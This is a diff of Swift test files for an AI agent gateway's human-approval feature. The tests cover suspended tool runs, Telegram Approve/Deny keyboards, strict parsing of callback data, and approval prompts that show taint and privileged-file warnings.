   let privateFileLoader: @Sendable () -> [String] = {
@@ -209,6 +213,7 @@ func makeSC3Harness(
     contextBuilder: contextBuilder,
     pendingConfirmations: registry,
     notifyOutbox: {},
+    parker: InertApprovalParker(coordinator: coordinator, logger: logger),
     logger: logger
   )
 
@@ -237,6 +242,7 @@ func makeSC3Harness(
 
   return SC3Harness(
     router: router,
+    coordinator: coordinator,
     registry: registry,
     transport: transport,
     stores: stores,

--- a/Tests/ClawGatewayTests/Acceptance/SuspendLaneHoldTests.swift
+++ b/Tests/ClawGatewayTests/Acceptance/SuspendLaneHoldTests.swift
@@ -1,0 +1,134 @@
+import ClawAgent
+import ClawCore
+import ClawData
+import ClawTools
+import ClawWorkspace
+import Foundation
+import GRDB
+import Testing
+
+@testable import ClawGateway
+
+/// A minimal ask-tier tool: resolves a fixed contained target and executes trivially. Exists only to
+/// drive the real gate → `TurnResult.suspended` in Phase 2 (no production tool declares `ask` yet).
+struct ScriptedAskTool: Tool {
+  var definition: ToolDefinition {
+    ToolDefinition(
+      name: "scripted_write",
+      description: "test-only ask-tier tool",
+      parameters: .object(["type": .string("object")]),
+      egressClass: .none,
+      riskLevel: .ask
+    )
+  }
+  var timeout: Duration { .seconds(5) }
+  func canonicalTarget(arguments: JSONValue) -> CanonicalTargetResolution? {
+    .resolved("/workspace/notes/plan.md")
+  }
+  func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload {
+    ToolPayload(content: "wrote it", status: .ok, ingestedUntrusted: false)
+  }
+}
+
+@Suite(.serialized) struct SuspendLaneHoldTests {
+  private func approvals(_ path: String) throws -> [Row] {
+    let pool = try ClawDatabase.makePool(path: path)
+    return try pool.read { db in try Row.fetchAll(db, sql: "SELECT * FROM approvals ORDER BY id") }
+  }
+
+  private func runState(_ path: String, _ runId: Int64) throws -> String? {
+    let pool = try ClawDatabase.makePool(path: path)
+    return try pool.read { db in
+      try String.fetchOne(db, sql: "SELECT state FROM runs WHERE id = ?", arguments: [runId])
+    }
+  }
+
+  @Test func proposalSuspendsHoldsTheLaneAndStaysAssemblyVisible() async throws {
+    // given — a shared coordinator so the test can release the held lane; the ask-tier tool
+    // registered as an extra tool; two scripts (the suspending proposal, then the plain message)
+    let coordinator = ApprovalCoordinator()
+    let harness = try makeSC3Harness(
+      scripts: [
+        [
+          toolCallResponse([
+            ToolCall(id: "w1", name: "scripted_write", argumentsJSON: "{}")
+          ])
+        ],
+        [okResponse(content: "second turn done")],
+      ],
+      httpResponses: [:],
+      coordinator: coordinator,
+      extraTools: [ScriptedAskTool()]
+    )
+
+    // when — the proposal suspends the run to a persisted checkpoint
+    _ = await harness.router.handle(rawUpdate: textUpdate(id: 1, from: 7, text: "write the plan"))
+    let approval = try #require(
+      try await pollUntil(timeout: .seconds(10)) {
+        try approvals(harness.databasePath).first
+      }
+    )
+    let approvalId: Int64 = approval["id"]
+    let runId: Int64 = approval["run_id"]
+
+    // then — persisted PENDING checkpoint + AWAITING run + prompt chunk with a keyboard
+    #expect(approval["state"] == ApprovalState.pending.rawValue)
+    #expect(approval["tool"] == "scripted_write")
+    #expect(try runState(harness.databasePath, runId) == RunState.awaitingApproval.rawValue)
+    let promptRow = try harness.stores.outbox.pendingOutbound().first
+    #expect(promptRow != nil)
+    let markup = try await ClawDatabase.makePool(path: harness.databasePath).read { db in
+      try String.fetchOne(
+        db,
+        sql: "SELECT reply_markup FROM outbound_deliveries WHERE approval_id = ?",
+        arguments: [approvalId]
+      )
+    }
+    #expect(markup?.isEmpty == false)
+
+    // when — a plain message arrives while the lane is HELD by the suspended turn
+    _ = await harness.router.handle(rawUpdate: textUpdate(id: 2, from: 7, text: "are you there?"))
+
+    // then — it must NOT have produced a reply yet (FIFO behind the held lane); the suspended run
+    // counts toward in-flight (Task 05 widened `runsHealth` to include AWAITING_APPROVAL).
+    try? await Task.sleep(for: .milliseconds(20))
+    #expect(try harness.stores.runs.runsHealth(now: Date()).inFlight >= 1)
+
+    // when — release the lane; the queued plain message now runs to completion. The reply lands in
+    // the durable OUTBOX — this harness wires no `OutboxDispatcher`, so nothing is sent over the
+    // `RecordingTransport`; existing SC3 assertions read `stores.outbox.pendingOutbound()` too.
+    await coordinator.signal(approvalId: approvalId, .denied(.cancelled))
+    _ = try await pollUntil(timeout: .seconds(10)) {
+      let payloads = try harness.stores.outbox.pendingOutbound().map(\.payload)
+      return payloads.contains { payload in payload.contains("second turn done") } ? true : nil
+    }
+
+    // then — the parked exchange is still assembly-visible: the anchor + its (placeholder) tool row
+    // survive `HistoryHygiene` even with the interleaved plain message (§5.3 contiguity). Asserted
+    // through the PUBLIC assembler (`assemble` runs `HistoryHygiene`), since the grouping helper
+    // `historyGroups`/`HistoryGroup` is `private` to `ContextBuilder.swift` and not test-reachable.
+    let sessionId: Int64 = approval["session_id"]
+    let contextBuilder = ContextBuilder(
+      systemPrompt: SystemPrompt.minimal,
+      workspace: FileSystemWorkspace(root: harness.workspaceRoot),
+      memoryStore: harness.stores.memory,
+      retriever: harness.stores.retriever,
+      budget: .default
+    )
+    let lastMessageId = try await ClawDatabase.makePool(path: harness.databasePath).read { db in
+      try Int64.fetchOne(
+        db,
+        sql: "SELECT MAX(id) FROM messages WHERE session_id = ?",
+        arguments: [sessionId]
+      ) ?? 0
+    }
+    let snapshot = try harness.stores.sessionMessages.loadContextSnapshot(
+      sessionId: sessionId,
+      throughMessageId: lastMessageId,
+      limit: 50
+    )
+    let assembled = try contextBuilder.assemble(snapshot: snapshot, sessionId: sessionId)
+    #expect(assembled.messages.contains { $0.role == .assistant && $0.toolCalls.isEmpty == false })
+    #expect(assembled.messages.contains { $0.role == .tool })
+  }
+}

--- a/Tests/ClawGatewayTests/Response/ApprovalKeyboardTests.swift
+++ b/Tests/ClawGatewayTests/Response/ApprovalKeyboardTests.swift
@@ -1,0 +1,113 @@
+import ClawCore
+import Testing
+
+@testable import ClawGateway
+
+@Suite struct ApprovalKeyboardTests {
+  private static let malformedCallbacks: [String] = [
+    "",  // empty
+    "apr:",  // no nonce, no verdict
+    "apr:nonce",  // two parts
+    "apr:nonce:y:extra",  // four parts
+    "xyz:nonce:y",  // wrong prefix
+    "nonce:y",  // missing prefix entirely
+    "apr::y",  // empty nonce
+    "apr:nonce:Y",  // wrong-case verdict
+    "apr:nonce:yes",  // verbose verdict
+    "apr:nonce:z",  // unknown verdict
+    "apr:no:nce:y",  // a colon inside the nonce region — never valid base64url
+  ]
+
+  @Test func callbackDataUsesThePinnedFraming() {
+    // given / when
+    let approve = ApprovalKeyboard.callbackData(
+      nonce: "AbC-1_dEfG",
+      verdict: ApprovalKeyboard.approveVerdict
+    )
+    let deny = ApprovalKeyboard.callbackData(
+      nonce: "AbC-1_dEfG",
+      verdict: ApprovalKeyboard.denyVerdict
+    )
+
+    // then — "apr:<nonce>:y" | "apr:<nonce>:n" (spec §4.6/§5.4)
+    #expect(approve == "apr:AbC-1_dEfG:y")
+    #expect(deny == "apr:AbC-1_dEfG:n")
+  }
+
+  @Test func callbackDataStaysUnderTelegramsSixtyFourByteCap() {
+    // given — a real 22-char base64url nonce is the production width
+    let nonce = ApprovalNonce.generate()
+
+    // when
+    let approve = ApprovalKeyboard.callbackData(
+      nonce: nonce,
+      verdict: ApprovalKeyboard.approveVerdict
+    )
+    let deny = ApprovalKeyboard.callbackData(nonce: nonce, verdict: ApprovalKeyboard.denyVerdict)
+
+    // then — the framing must never overflow Telegram's callback_data cap (spec §4.6)
+    #expect(approve.utf8.count <= 64)
+    #expect(deny.utf8.count <= 64)
+  }
+
+  @Test func parseRoundTripsBothVerdicts() {
+    // given
+    let nonce = "AbC-1_dEfG"
+
+    // when
+    let approve = ApprovalKeyboard.parse(
+      ApprovalKeyboard.callbackData(nonce: nonce, verdict: ApprovalKeyboard.approveVerdict)
+    )
+    let deny = ApprovalKeyboard.parse(
+      ApprovalKeyboard.callbackData(nonce: nonce, verdict: ApprovalKeyboard.denyVerdict)
+    )
+
+    // then — the nonce survives verbatim; the verdict maps to the approve flag
+    #expect(approve?.nonce == nonce)
+    #expect(approve?.approve == true)
+    #expect(deny?.nonce == nonce)
+    #expect(deny?.approve == false)
+  }
+
+  @Test(arguments: malformedCallbacks)
+  func parseStrictlyRejectsMalformedData(_ callbackData: String) {
+    // given / when / then — anything not "apr:<nonce>:y|n" is dropped before the §6.2 auth chain
+    #expect(ApprovalKeyboard.parse(callbackData) == nil)
+  }
+
+  @Test func markupIsDeterministicAndCarriesBothCallbacks() {
+    // given
+    let nonce = "AbC-1_dEfG"
+
+    // when — no Date, no randomness: the same input renders byte-identical markup
+    let first = ApprovalKeyboard.markup(nonce: nonce)
+    let second = ApprovalKeyboard.markup(nonce: nonce)
+
+    // then
+    #expect(first == second)
+    #expect(first.contains("apr:AbC-1_dEfG:y"))
+    #expect(first.contains("apr:AbC-1_dEfG:n"))
+    #expect(first.contains("\"inline_keyboard\""))
+  }
+
+  @Test func markupEmbedsCallbacksThatParseAccepts() {
+    // given — a real nonce, to prove the button data the client echoes back is exactly what
+    // parse validates (the suspend→callback round trip closes here)
+    let nonce = ApprovalNonce.generate()
+
+    // when
+    let markup = ApprovalKeyboard.markup(nonce: nonce)
+
+    // then
+    #expect(
+      markup.contains(
+        ApprovalKeyboard.callbackData(nonce: nonce, verdict: ApprovalKeyboard.approveVerdict)
+      )
+    )
+    let approve = ApprovalKeyboard.parse(
+      ApprovalKeyboard.callbackData(nonce: nonce, verdict: ApprovalKeyboard.approveVerdict)
+    )
+    #expect(approve?.nonce == nonce)
+    #expect(approve?.approve == true)
+  }
+}

--- a/Tests/ClawGatewayTests/Response/ToolApprovalPromptTests.swift
+++ b/Tests/ClawGatewayTests/Response/ToolApprovalPromptTests.swift
@@ -35,4 +35,203 @@ import Testing
     #expect(text.contains("file_write"))
     #expect(text.contains("/workspace/notes/plan.md"))
   }
+
+  private func recorded(
+    tool: String,
+    target: String,
+    reason: ApprovalReason,
+    blastRadius: String,
+    preview: String? = nil,
+    warnings: [String] = []
+  ) -> RecordedToolAction {
+    RecordedToolAction(
+      tool: tool,
+      canonicalArgsJSON: "{}",
+      argsHash: "hash16hash16hash",
+      canonicalTarget: target,
+      reason: reason,
+      presentation: ToolApprovalPresentation(
+        blastRadius: blastRadius,
+        contentPreview: preview,
+        warnings: warnings
+      )
+    )
+  }
+
+  @Test func richPromptCarriesToolFullTargetAndBlastRadius() {
+    // given
+    let input = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "file_write",
+        target: "/workspace/notes/plan.md",
+        reason: .askTier,
+        blastRadius: "create, 1.2 KB"
+      ),
+      taintBanner: false,
+      privilegedFileBanner: false
+    )
+
+    // when
+    let text = ToolApprovalPrompt.text(for: input)
+
+    // then — structural fields only (TESTING §7.2): tool, fully-resolved target, blast radius
+    #expect(text.contains("file_write"))
+    #expect(text.contains("/workspace/notes/plan.md"))
+    #expect(text.contains("create, 1.2 KB"))
+  }
+
+  @Test func fullyResolvedUrlTargetIsNeverTruncated() {
+    // given — a long URL with a query string (§5.4: full URL, never model-truncated)
+    let target = "https://example.com/a/b/c?token=abcdefghijklmnop&next=2&page=3"
+    let input = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "web_fetch",
+        target: target,
+        reason: .exfilTrifecta,
+        blastRadius: "egress to example.com"
+      ),
+      taintBanner: true,
+      privilegedFileBanner: false
+    )
+
+    // when
+    let text = ToolApprovalPrompt.text(for: input)
+
+    // then
+    #expect(text.contains(target))
+  }
+
+  @Test func taintBannerAppearsOnlyWhenSet() {
+    // given
+    let withTaint = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "file_write",
+        target: "/w/a.md",
+        reason: .askTier,
+        blastRadius: "create, 3 B"
+      ),
+      taintBanner: true,
+      privilegedFileBanner: false
+    )
+    let withoutTaint = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "file_write",
+        target: "/w/a.md",
+        reason: .askTier,
+        blastRadius: "create, 3 B"
+      ),
+      taintBanner: false,
+      privilegedFileBanner: false
+    )
+
+    // when / then — the TAINT marker is present exactly when the originating turn ingested
+    // untrusted content
+    #expect(ToolApprovalPrompt.text(for: withTaint).contains("TAINT"))
+    #expect(ToolApprovalPrompt.text(for: withoutTaint).contains("TAINT") == false)
+  }
+
+  @Test func privilegedFileBannerAppearsOnlyWhenSet() {
+    // given
+    let privileged = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "file_write",
+        target: "/w/MEMORY.md",
+        reason: .askTier,
+        blastRadius: "overwrite, 40 B"
+      ),
+      taintBanner: false,
+      privilegedFileBanner: true
+    )
+    let ordinary = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "file_write",
+        target: "/w/notes.md",
+        reason: .askTier,
+        blastRadius: "overwrite, 40 B"
+      ),
+      taintBanner: false,
+      privilegedFileBanner: false
+    )
+
+    // when / then — §5.4 privileged-file warning (SOUL/AGENTS/USER/MEMORY .md)
+    #expect(ToolApprovalPrompt.text(for: privileged).contains("PRIVILEGED"))
+    #expect(ToolApprovalPrompt.text(for: ordinary).contains("PRIVILEGED") == false)
+  }
+
+  @Test func contentPreviewRendersWhenPresentAndIsOmittedWhenNil() {
+    // given — the preview is already size-capped + secret-redacted by the tool (§5.4)
+    let withPreview = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "file_write",
+        target: "/w/a.md",
+        reason: .askTier,
+        blastRadius: "create, 5 B",
+        preview: "hello"
+      ),
+      taintBanner: false,
+      privilegedFileBanner: false
+    )
+    let withoutPreview = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "web_fetch",
+        target: "https://x.example/y",
+        reason: .exfilTrifecta,
+        blastRadius: "egress to x.example",
+        preview: nil
+      ),
+      taintBanner: true,
+      privilegedFileBanner: false
+    )
+
+    // when / then
+    #expect(ToolApprovalPrompt.text(for: withPreview).contains("hello"))
+    #expect(ToolApprovalPrompt.text(for: withoutPreview).contains("Preview") == false)
+  }
+
+  @Test func memoryWriteScanWarningsSurfaceInThePrompt() {
+    // given
+    let input = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "memory_write",
+        target: "memory_item:fact:0123456789abcdef",
+        reason: .askTier,
+        blastRadius: "fact, normal",
+        preview: "the note text",
+        warnings: ["looks like a secret", "instruction-shaped text"]
+      ),
+      taintBanner: false,
+      privilegedFileBanner: false
+    )
+
+    // when
+    let text = ToolApprovalPrompt.text(for: input)
+
+    // then — each scan warning is shown so the owner can judge before approving
+    #expect(text.contains("looks like a secret"))
+    #expect(text.contains("instruction-shaped text"))
+  }
+
+  @Test func richPromptRendersForEveryApprovalReason() {
+    // given — the renderer is exhaustive over ApprovalReason; this pins that both reasons produce
+    // owner-facing copy carrying the target at runtime (the compile-time guarantee is the switch)
+    for reason in [ApprovalReason.askTier, ApprovalReason.exfilTrifecta] {
+      let input = ToolApprovalPrompt.Input(
+        recorded: recorded(
+          tool: "file_write",
+          target: "/w/target-\(reason.rawValue).md",
+          reason: reason,
+          blastRadius: "create, 1 B"
+        ),
+        taintBanner: false,
+        privilegedFileBanner: false
+      )
+
+      // when
+      let text = ToolApprovalPrompt.text(for: input)
+
+      // then
+      #expect(text.isEmpty == false)
+      #expect(text.contains("/w/target-\(reason.rawValue).md"))
+    }
+  }
 }

--- a/Tests/ClawGatewayTests/Routing/ApprovalCoordinatorTests.swift
+++ b/Tests/ClawGatewayTests/Routing/ApprovalCoordinatorTests.swift
@@ -1,0 +1,41 @@
+import ClawCore
+import Testing
+
+@testable import ClawGateway
+
+@Suite struct ApprovalCoordinatorTests {
+  @Test func awaitBeforeSignalDeliversWhenSignalArrives() async {
+    // given — a waiter registers first
+    let coordinator = ApprovalCoordinator()
+    async let resolution = coordinator.awaitResolution(approvalId: 42)
+
+    // when — the signal arrives afterwards
+    await coordinator.signal(approvalId: 42, .approved)
+
+    // then
+    #expect(await resolution == .approved)
+  }
+
+  @Test func signalBeforeAwaitIsBufferedAndReturnsImmediately() async {
+    // given — the resolution lands BEFORE the waiter registers (the suspend-commit race)
+    let coordinator = ApprovalCoordinator()
+    await coordinator.signal(approvalId: 7, .denied(.expired))
+
+    // when — the waiter registers late
+    let resolution = await coordinator.awaitResolution(approvalId: 7)
+
+    // then — the buffered signal is delivered, not lost
+    #expect(resolution == .denied(.expired))
+  }
+
+  @Test func signalsAreKeyedPerApprovalId() async {
+    // given
+    let coordinator = ApprovalCoordinator()
+    await coordinator.signal(approvalId: 1, .approved)
+    await coordinator.signal(approvalId: 2, .denied(.cancelled))
+
+    // when / then — each id resolves to its own buffered signal
+    #expect(await coordinator.awaitResolution(approvalId: 2) == .denied(.cancelled))
+    #expect(await coordinator.awaitResolution(approvalId: 1) == .approved)
+  }
+}

--- a/Tests/ClawGatewayTests/Routing/TurnRunnerTests.swift
+++ b/Tests/ClawGatewayTests/Routing/TurnRunnerTests.swift
@@ -59,6 +59,15 @@ struct CancellingBeforeAssistantCommitRuns: RunStore {
     try base.failRun(runId: runId, now: now)
   }
 
+  func commitSuspendedTurn(
+    runId: Int64,
+    sessionId: Int64,
+    commit: SuspendedTurnCommit,
+    now: Date
+  ) throws -> SuspendedCommitReceipt {
+    try base.commitSuspendedTurn(runId: runId, sessionId: sessionId, commit: commit, now: now)
+  }
+
   func cancelActiveRun(sessionId: Int64, reason: CancelReason, now: Date) throws -> Int64? {
     try base.cancelActiveRun(sessionId: sessionId, reason: reason, now: now)
   }
@@ -107,6 +116,15 @@ struct CancellingBeforeDegradedCommitRuns: RunStore {
     try base.failRun(runId: runId, now: now)
   }
 
+  func commitSuspendedTurn(
+    runId: Int64,
+    sessionId: Int64,
+    commit: SuspendedTurnCommit,
+    now: Date
+  ) throws -> SuspendedCommitReceipt {
+    try base.commitSuspendedTurn(runId: runId, sessionId: sessionId, commit: commit, now: now)
+  }
+
   func cancelActiveRun(sessionId: Int64, reason: CancelReason, now: Date) throws -> Int64? {
     try base.cancelActiveRun(sessionId: sessionId, reason: reason, now: now)
   }
@@ -140,6 +158,14 @@ struct DiskFullRuns: RunStore {
   func commitAssistantTurn(_ turn: AssistantTurn, now: Date) throws -> RunCommitResult { .ignored }
   func commitDegradedTurn(_ turn: DegradedTurn, now: Date) throws -> RunCommitResult { .ignored }
   func failRun(runId: Int64, now: Date) throws {}
+  func commitSuspendedTurn(
+    runId: Int64,
+    sessionId: Int64,
+    commit: SuspendedTurnCommit,
+    now: Date
+  ) throws -> SuspendedCommitReceipt {
+    throw StoreError.diskFull
+  }
   func cancelActiveRun(sessionId: Int64, reason: CancelReason, now: Date) throws -> Int64? { nil }
   func supersedeSessionRuns(sessionId: Int64, now: Date) throws -> [Int64] { [] }
   func reconcileRunsAtBoot(

--- a/Tests/ClawGatewayTests/Services/OutboxDispatcherTests.swift
+++ b/Tests/ClawGatewayTests/Services/OutboxDispatcherTests.swift
@@ -16,14 +16,18 @@ private struct MarkSentFailingOutbox: OutboxStore {
     stepIndex: Int,
     chatId: Int64,
     payload: String,
-    payloadHash: String
+    payloadHash: String,
+    approvalId: Int64?,
+    replyMarkup: String?
   ) throws -> Bool {
     try base.claimOutbound(
       runId: runId,
       stepIndex: stepIndex,
       chatId: chatId,
       payload: payload,
-      payloadHash: payloadHash
+      payloadHash: payloadHash,
+      approvalId: approvalId,
+      replyMarkup: replyMarkup
     )
   }
 
@@ -32,14 +36,18 @@ private struct MarkSentFailingOutbox: OutboxStore {
     stepIndex: Int,
     chatId: Int64,
     payload: String,
-    payloadHash: String
+    payloadHash: String,
+    approvalId: Int64?,
+    replyMarkup: String?
   ) throws -> Bool {
     try base.claimOutboundIfRunActive(
       runId: runId,
       stepIndex: stepIndex,
       chatId: chatId,
       payload: payload,
-      payloadHash: payloadHash
+      payloadHash: payloadHash,
+      approvalId: approvalId,
+      replyMarkup: replyMarkup
     )
   }
 
@@ -48,6 +56,39 @@ private struct MarkSentFailingOutbox: OutboxStore {
   }
 
   func pendingOutbound() throws -> [OutboxRow] { try base.pendingOutbound() }
+}
+
+/// Records the `replyMarkup` argument the dispatcher passes to each send overload. Implements the
+/// reply-markup overloads directly (rather than the throwing default) so the keyboard is captured.
+private actor ReplyMarkupSpy: MessageDelivery {
+  private(set) var richMarkups: [String?] = []
+  private(set) var plainMarkups: [String?] = []
+  private let failRich: Bool
+
+  init(failRich: Bool = false) {
+    self.failRich = failRich
+  }
+
+  func sendMessage(chatId: Int64, text: String) async throws -> Int64 { 1 }
+
+  func sendRichMessage(chatId: Int64, markdown: String) async throws -> Int64 { 1 }
+
+  func sendMessage(chatId: Int64, text: String, replyMarkup: String?) async throws -> Int64 {
+    plainMarkups.append(replyMarkup)
+    return 1
+  }
+
+  func sendRichMessage(
+    chatId: Int64,
+    markdown: String,
+    replyMarkup: String?
+  ) async throws -> Int64 {
+    if failRich {
+      throw TelegramError.transport("rich down")
+    }
+    richMarkups.append(replyMarkup)
+    return 1
+  }
 }
 
 @Suite struct OutboxDispatcherTests {
@@ -184,5 +225,59 @@ private struct MarkSentFailingOutbox: OutboxStore {
     let deliveredMarkdown = await transport.richSends.map { $0.markdown }
     #expect(deliveredMarkdown == ["hello"])
     #expect(try fixture.outbox.pendingOutbound().count == 1)
+  }
+
+  @Test func dispatcherForwardsReplyMarkupOnTheRichSend() async throws {
+    // given — a PENDING row carrying an inline keyboard
+    let fixture = try makeFixture()
+    let markup = "{\"inline_keyboard\":[[{\"text\":\"Approve\",\"callback_data\":\"apr:x:y\"}]]}"
+    _ = try fixture.outbox.claimOutbound(
+      runId: fixture.runId,
+      stepIndex: 0,
+      chatId: fixture.chatId,
+      payload: "prompt",
+      payloadHash: "h",
+      replyMarkup: markup
+    )
+    let spy = ReplyMarkupSpy()
+    let dispatcher = OutboxDispatcher(
+      outbox: fixture.outbox,
+      delivery: spy,
+      signal: OutboxSignal(),
+      logger: TestLog.silent
+    )
+
+    // when
+    await dispatcher.drainOnce()
+
+    // then — the keyboard rode the rich send
+    #expect(await spy.richMarkups == [markup])
+  }
+
+  @Test func dispatcherForwardsReplyMarkupOnThePlainFallback() async throws {
+    // given — the rich send fails, forcing the plain fallback
+    let fixture = try makeFixture()
+    let markup = "{\"inline_keyboard\":[[{\"text\":\"Approve\",\"callback_data\":\"apr:x:y\"}]]}"
+    _ = try fixture.outbox.claimOutbound(
+      runId: fixture.runId,
+      stepIndex: 0,
+      chatId: fixture.chatId,
+      payload: "prompt",
+      payloadHash: "h",
+      replyMarkup: markup
+    )
+    let spy = ReplyMarkupSpy(failRich: true)
+    let dispatcher = OutboxDispatcher(
+      outbox: fixture.outbox,
+      delivery: spy,
+      signal: OutboxSignal(),
+      logger: TestLog.silent
+    )
+
+    // when
+    await dispatcher.drainOnce()
+
+    // then — the same keyboard rode the plain fallback
+    #expect(await spy.plainMarkups == [markup])
   }
 }

--- a/Tests/ClawTelegramTests/Client/CallbackMethodsTests.swift
+++ b/Tests/ClawTelegramTests/Client/CallbackMethodsTests.swift
@@ -1,0 +1,129 @@
+import Foundation
+import Testing
+
+@testable import ClawCore
+@testable import ClawTelegram
+
+@Suite struct CallbackMethodsTests {
+  private static let okBool = HTTPResult(
+    statusCode: 200,
+    headers: [:],
+    body: Data(#"{"ok":true,"result":true}"#.utf8)
+  )
+
+  private func makeClient(
+    result: HTTPResult
+  ) -> (client: TelegramClient, recorder: RecordingHTTPExecutor.Recorder) {
+    let recorder = RecordingHTTPExecutor.Recorder()
+    let executor = RecordingHTTPExecutor(recorder: recorder, result: result)
+    let client = TelegramClient(token: "T", http: executor, baseURL: "https://example.test")
+    return (client, recorder)
+  }
+
+  private func bodyObject(_ data: Data) throws -> [String: Any] {
+    try #require(try JSONSerialization.jsonObject(with: data) as? [String: Any])
+  }
+
+  @Test func answerCallbackQueryPostsTheCallbackId() async throws {
+    // given
+    let harness = makeClient(result: Self.okBool)
+
+    // when — the spinner-stopping answer carries callback_query_id + the neutral toast text
+    try await harness.client.answerCallbackQuery(id: "cbq-1", text: "already handled")
+
+    // then
+    let call = try #require(await harness.recorder.calls.first)
+    #expect(call.url.hasSuffix("/answerCallbackQuery"))
+    let body = try bodyObject(call.body)
+    #expect(body["callback_query_id"] as? String == "cbq-1")
+    #expect(body["text"] as? String == "already handled")
+  }
+
+  @Test func answerCallbackQueryOmitsAbsentText() async throws {
+    // given
+    let harness = makeClient(result: Self.okBool)
+
+    // when
+    try await harness.client.answerCallbackQuery(id: "cbq-2", text: nil)
+
+    // then — a nil toast is omitted, not sent as JSON null
+    let body = try bodyObject(try #require(await harness.recorder.calls.first).body)
+    #expect(body["callback_query_id"] as? String == "cbq-2")
+    #expect(body["text"] == nil)
+  }
+
+  @Test func editMessageReplyMarkupSendsTheKeyboardObject() async throws {
+    // given
+    let harness = makeClient(result: Self.okBool)
+    let markup = #"{"inline_keyboard":[[{"text":"Approve","callback_data":"apr:abc:y"}]]}"#
+
+    // when
+    try await harness.client.editMessageReplyMarkup(chatId: 7, messageId: 500, replyMarkup: markup)
+
+    // then — reply_markup rides as a JSON OBJECT (decoded from the string), never a string
+    let call = try #require(await harness.recorder.calls.first)
+    #expect(call.url.hasSuffix("/editMessageReplyMarkup"))
+    let body = try bodyObject(call.body)
+    #expect(body["chat_id"] as? Int == 7)
+    #expect(body["message_id"] as? Int == 500)
+    let replyMarkup = try #require(body["reply_markup"] as? [String: Any])
+    let rows = try #require(replyMarkup["inline_keyboard"] as? [[[String: String]]])
+    #expect(rows[0][0]["callback_data"] == "apr:abc:y")
+  }
+
+  @Test func editMessageReplyMarkupWithNilRemovesTheKeyboard() async throws {
+    // given
+    let harness = makeClient(result: Self.okBool)
+
+    // when — button disarm: nil markup omits reply_markup, telling Telegram to drop the keyboard
+    try await harness.client.editMessageReplyMarkup(chatId: 7, messageId: 500, replyMarkup: nil)
+
+    // then
+    let body = try bodyObject(try #require(await harness.recorder.calls.first).body)
+    #expect(body["reply_markup"] == nil)
+  }
+
+  @Test func sendMessageWithReplyMarkupCarriesTheKeyboard() async throws {
+    // given
+    let harness = makeClient(
+      result: HTTPResult(
+        statusCode: 200,
+        headers: [:],
+        body: Data(#"{"ok":true,"result":{"message_id":123,"chat":{"id":7}}}"#.utf8)
+      )
+    )
+    let markup = #"{"inline_keyboard":[[{"text":"Approve","callback_data":"apr:abc:y"}]]}"#
+
+    // when
+    let messageId = try await harness.client.sendMessage(
+      chatId: 7,
+      text: "approve?",
+      replyMarkup: markup
+    )
+
+    // then
+    #expect(messageId == 123)
+    let body = try bodyObject(try #require(await harness.recorder.calls.first).body)
+    let replyMarkup = try #require(body["reply_markup"] as? [String: Any])
+    #expect(replyMarkup["inline_keyboard"] != nil)
+  }
+
+  @Test func plainSendMessageOmitsReplyMarkup() async throws {
+    // given
+    let harness = makeClient(
+      result: HTTPResult(
+        statusCode: 200,
+        headers: [:],
+        body: Data(#"{"ok":true,"result":{"message_id":1,"chat":{"id":7}}}"#.utf8)
+      )
+    )
+
+    // when — the two-arg MessageDelivery path used by ordinary replies (unchanged behavior)
+    _ = try await harness.client.sendMessage(chatId: 7, text: "hi")
+
+    // then — no keyboard key leaks onto non-approval replies
+    let body = try bodyObject(try #require(await harness.recorder.calls.first).body)
+    #expect(body["reply_markup"] == nil)
+    #expect(body["text"] as? String == "hi")
+  }
+}

--- a/Tests/ClawTelegramTests/Wire/CallbackWireTests.swift
+++ b/Tests/ClawTelegramTests/Wire/CallbackWireTests.swift
@@ -1,0 +1,69 @@
+import ClawCore
+import Foundation
+import Testing
+
+@testable import ClawTelegram
+
+@Suite struct CallbackWireTests {
+  private let decoder = JSONDecoder()
+
+  @Test func decodesACallbackQueryUpdate() throws {
+    // given — a getUpdates payload carrying a callback_query (an inline-button tap)
+    let json = """
+      {
+        "update_id": 42,
+        "callback_query": {
+          "id": "cbq-1",
+          "from": {"id": 7, "is_bot": false, "username": "owner"},
+          "message": {"message_id": 500, "chat": {"id": 7}},
+          "data": "apr:abc123:y"
+        }
+      }
+      """
+
+    // when
+    let update = try decoder.decode(TUpdate.self, from: Data(json.utf8))
+
+    // then — the fields the §6.2 auth chain binds to; `from` is never absent for a callback
+    let callback = try #require(update.callback_query)
+    #expect(callback.id == "cbq-1")
+    #expect(callback.from.id == 7)
+    #expect(callback.message?.message_id == 500)
+    #expect(callback.data == "apr:abc123:y")
+  }
+
+  @Test func plainMessageUpdateHasNoCallback() throws {
+    // given — an ordinary text update with no callback_query key
+    let json = """
+      {"update_id": 1, "message": {"message_id": 9, "chat": {"id": 7}, "text": "hi"}}
+      """
+
+    // when
+    let update = try decoder.decode(TUpdate.self, from: Data(json.utf8))
+
+    // then — the added optional is absent and the existing message mapping is unchanged
+    #expect(update.callback_query == nil)
+    #expect(update.toRawUpdate().message?.text == "hi")
+  }
+
+  @Test func inlineKeyboardEncodesTheTelegramWireShape() throws {
+    // given — the canonical reply_markup shape the approval keyboard's JSON string (Task 13)
+    // must reproduce byte-for-key: {"inline_keyboard":[[{"text":…,"callback_data":…}]]}
+    let markup = TInlineKeyboardMarkup(inline_keyboard: [
+      [
+        TInlineKeyboardButton(text: "Approve", callback_data: "apr:abc:y"),
+        TInlineKeyboardButton(text: "Deny", callback_data: "apr:abc:n"),
+      ]
+    ])
+
+    // when — a plain encoder: the snake_case field names ARE the wire keys, no strategy mangling
+    let data = try JSONEncoder().encode(markup)
+    let object = try #require(try JSONSerialization.jsonObject(with: data) as? [String: Any])
+
+    // then
+    let rows = try #require(object["inline_keyboard"] as? [[[String: String]]])
+    #expect(rows[0][0]["text"] == "Approve")
+    #expect(rows[0][0]["callback_data"] == "apr:abc:y")
+    #expect(rows[0][1]["callback_data"] == "apr:abc:n")
+  }
+}

--- a/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
